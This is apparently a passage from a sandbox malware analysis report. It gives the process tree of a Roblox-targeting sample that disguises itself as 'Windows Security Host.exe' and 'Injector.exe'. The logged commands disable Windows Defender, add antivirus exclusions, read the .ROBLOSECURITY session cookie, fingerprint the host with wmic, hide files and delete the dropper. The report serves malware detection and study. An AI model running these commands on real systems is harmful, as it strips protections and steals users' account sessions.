        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:3588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:2480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:3300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2096
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:4892
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2376
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        28⤵
        Executes dropped EXE
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        28⤵
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        29⤵
        Executes dropped EXE
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        29⤵
        Executes dropped EXE
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        29⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        30⤵
        Executes dropped EXE
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        30⤵
        Executes dropped EXE
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        30⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        31⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:1144
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        32⤵
        Views/modifies file attributes
        
        PID:404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:3012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:3212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:980
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:4820
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4292
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        31⤵
        Executes dropped EXE
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        31⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        32⤵
        Executes dropped EXE
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        32⤵
        Executes dropped EXE
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        32⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        33⤵
        Executes dropped EXE
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        33⤵
        Executes dropped EXE
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        33⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        34⤵
        Drops file in Drivers directory
        
        PID:4808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:3628
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        35⤵
        Views/modifies file attributes
        
        PID:4588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:992
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        35⤵
        
        PID:4488
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:4820
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        35⤵
        
        PID:4848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        35⤵
        
        PID:4988
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        35⤵
        Detects videocard installed
        
        PID:4516
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        35⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:224
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        34⤵
        Drops startup file
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\csfemm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csfemm.exe"
        35⤵
        Impair Defenses: Safe Mode Boot
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        34⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        35⤵
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        35⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        35⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        36⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        36⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        36⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        37⤵
        Drops file in Drivers directory
        
        PID:2360
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:688
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        38⤵
        Views/modifies file attributes
        
        PID:4360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:3984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:1080
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:1976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:4520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        
        PID:4752
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:3184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        
        PID:3620
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3032
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        37⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        37⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        38⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        38⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        38⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        39⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        39⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        39⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        40⤵
        Drops file in Drivers directory
        
        PID:4240
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:3396
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        41⤵
        Views/modifies file attributes
        
        PID:3324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        
        PID:2732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:4316
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:4036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:5048
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1980
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:4236
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4668
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        40⤵
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        40⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        41⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        41⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        41⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        42⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        42⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        42⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        43⤵
        Drops file in Drivers directory
        
        PID:4828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:4944
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        44⤵
        Views/modifies file attributes
        
        PID:3396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        44⤵
        
        PID:4548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:4992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:2380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:2508
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        44⤵
        
        PID:4672
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        44⤵
        
        PID:4480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:5116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:4036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        44⤵
        Detects videocard installed
        
        PID:1716
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2804
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        43⤵
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        43⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        44⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        44⤵
        
        PID:3588
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        44⤵
        
        PID:704
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        45⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        45⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        45⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        46⤵
        Drops file in Drivers directory
        
        PID:3840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:3980
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        47⤵
        Views/modifies file attributes
        
        PID:4944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:4196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:2692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        47⤵
        
        PID:5020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        47⤵
        
        PID:4128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:704
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:4528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        47⤵
